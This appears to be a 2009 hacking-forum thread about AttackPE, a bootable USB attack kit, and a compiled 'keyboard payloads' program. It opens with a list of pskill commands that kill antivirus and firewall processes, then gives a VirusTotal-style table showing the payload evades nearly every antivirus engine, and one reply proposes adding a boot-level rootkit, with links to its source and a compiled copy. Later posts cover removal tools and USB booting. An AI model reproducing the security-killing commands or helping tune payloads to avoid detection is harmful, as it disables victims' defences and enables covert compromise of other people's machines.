pskill WEBTRAP
pskill WGFE95
pskill Winaw32
pskill winroute
pskill winss
pskill winssnotify
pskill WRADMIN
pskill WRCTRL
pskill xcommsvr
pskill zatutor
pskill ZAUINST
pskill zlclient
pskill zonealarm
pskill _AVP32
pskill _AVPCC
pskill _AVPM
pskill scanwscs
pskill scanmsg
pskill onlnsvc
pskill upschd
pskill antivirus 

timmy, timmy, timmy... we are well versed in the art of teh internets here

*** hope to have a new version up soon (lots of cool new stuff)... fucking school :( ***

Link to comment
Share on other sites

Wonder if i could get a few people to test the new payload install method, made a nice little GUI.

This is just a few keyboard payloads i made while playing around with AHK (lots of fun btw!). Patch it into your AttackPE.iso file and select "PE" under mode to install payloads from PE otherwise select "Normal" mode.

Note: You may need to runas an admin in vista if uac is enabled (and not in pe)!

Features;

1. All Keyboard Payloads Included in One Small .exe

2. Built In Removal Tools

3. GUI (Simple)

4. Install payloads from Normal Mode or P.E.

5. Auto detects if you're in Normal or P.E. (v1.2+)

6. You do NOT need AttackPE to use these payloads!

Planning on converting all the payloads to something like this, so let me know what you think!

Download:

Compiled && Source (v1.2)

Detection Rate:

Antivirus Version Last Update Result

a-squared 4.0.0.101 2009.04.21 -

AhnLab-V3 5.0.0.2 2009.04.21 -

AntiVir 7.9.0.148 2009.04.20 -

Antiy-AVL 2.0.3.1 2009.04.20 -

Authentium 5.1.2.4 2009.04.20 -

Avast 4.8.1335.0 2009.04.20 -

AVG 8.5.0.287 2009.04.20 -

BitDefender 7.2 2009.04.21 -

CAT-QuickHeal 10.00 2009.04.21 -

ClamAV 0.94.1 2009.04.21 -

Comodo 1123 2009.04.20 -

DrWeb 4.44.0.09170 2009.04.21 -

eSafe 7.0.17.0 2009.04.20 - Suspicious File

eTrust-Vet 31.6.6440 2009.04.20 -

F-Prot 4.4.4.56 2009.04.20 -

F-Secure 8.0.14470.0 2009.04.21 -

Fortinet 3.117.0.0 2009.04.21 -

GData 19 2009.04.21 -

Ikarus T3.1.1.49.0 2009.04.21 -

K7AntiVirus 7.10.709 2009.04.20 -

Kaspersky 7.0.0.125 2009.04.21 -

McAfee 5590 2009.04.20 -

McAfee+Artemis 5590 2009.04.20 -

McAfee-GW-Edition 6.7.6 2009.04.21 -

Microsoft 1.4602 2009.04.21 -

NOD32 4023 2009.04.20 -

Norman 6.00.06 2009.04.20 -

nProtect 2009.1.8.0 2009.04.20 -

Panda 10.0.0.14 2009.04.20 -

PCTools 4.4.2.0 2009.04.21 -

Prevx1 V2 2009.04.21 -

Rising 21.26.10.00 2009.04.21 -

Sophos 4.40.0 2009.04.21 -

Sunbelt 3.2.1858.2 2009.04.18 -

Symantec 1.4.4.12 2009.04.21 -

TheHacker 6.3.4.0.312 2009.04.21 -

TrendMicro 8.700.0.1004 2009.04.21 -

VBA32 3.12.10.2 2009.04.21 -

ViRobot 2009.4.21.1701 2009.04.21 -

VirusBuster 4.6.5.0 2009.04.20 -

Total: 2.5% (Suspicious File Only)

Link to comment
Share on other sites

Hi, been reading these forums for a while now so decided to join so i can contribute and learn a bit more. :). any way...

sable i tried your payloads ui and they work perfect but i cannot seem to disable th epayload once its activated. it says its removed but i still get binary lol :). any ideas

EDIT: also forgot to say sophos does not detect a thing. bonus

Link to comment
Share on other sites

SableFoxx, Why not add something like the VBrootkit? It takes control of windows boot process to allow privilege escalation? Here is the source:

http://www.nvlabs.in/archives/5-BOOT-KIT-C...Subversion.html

And the white paper:

http://www.nvlabs.in/uploads/projects/vboo..._whitepaper.pdf

Here is a compiled version, not yet tested:

http://www.mediafire.com/download.php?2zrkzmuakyn

Link to comment
Share on other sites

Hi, been reading these forums for a while now so decided to join so i can contribute and learn a bit more. :). any way...

sable i tried your payloads ui and they work perfect but i cannot seem to disable th epayload once its activated. it says its removed but i still get binary lol :). any ideas

EDIT: also forgot to say sophos does not detect a thing. bonus

My bad, press the Windows Key + X (keyr.exe does NOT remap the 'x' key by default) to stop all the keyboard payloads this only tmp stops the payload that is running, then run removal. Also if you're running vista you may need to run the keybrd_pl.exe 'as admin'. Thx for the input, ill make a fix for this.

There are also some bugs in keyr.exe i'll be posting updates soon.

@DingleBerries, internesting... very interesting...

4/25/09 Edit: Released updated v1.2 fixes bugs with Keyr and removal not working correctly after payload was activated

Link to comment
Share on other sites

almost everything has a removal tool (only the cmdo payload does not) the updated version im working on now will fix that. but certainly anytime you boot into a PE a couple wrong clicks, or commands can break the local os, so be careful *shakes finger*

the new keyboard payloads have a built-in removal tool as of 1.2 it actually works :)

Link to comment
Share on other sites

almost everything has a removal tool (only the cmdo payload does not) the updated version im working on now will fix that. but certainly anytime you boot into a PE a couple wrong clicks, or commands can break the local os.

the new keyboard payloads have a built-in removal tool

Thanks for such a speedy reply. Great project.

:)

Link to comment
Share on other sites

Sorry for double post.

I tried to install this, but could boot to my USB drive on my home PC. The PC is normally a bit of a tough one for booting to USB - even after disabling the HD in the BIOS, it fails to detect the OS on the USB, and magically boots to vista :(. I even booted into Puppy Linux to make the USB partition bootable - still nothing.

Any help would be great. Thanks.

Link to comment
Share on other sites

Sorry for double post.

I tried to install this, but could boot to my USB drive on my home PC. The PC is normally a bit of a tough one for booting to USB - even after disabling the HD in the BIOS, it fails to detect the OS on the USB, and magically boots to vista :(. I even booted into Puppy Linux to make the USB partition bootable - still nothing.

Any help would be great. Thanks.

In my experience sometimes APE just won't boot on some systems, and im not sure how to fix that. However here are a few tricks you can try;

1. Use a different USB drive, sometimes its the drive itself not the computer

2. Disable USB Legacy support in the BIOS (not every bios has this)

If anyone else has found some cool tricks please post them.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...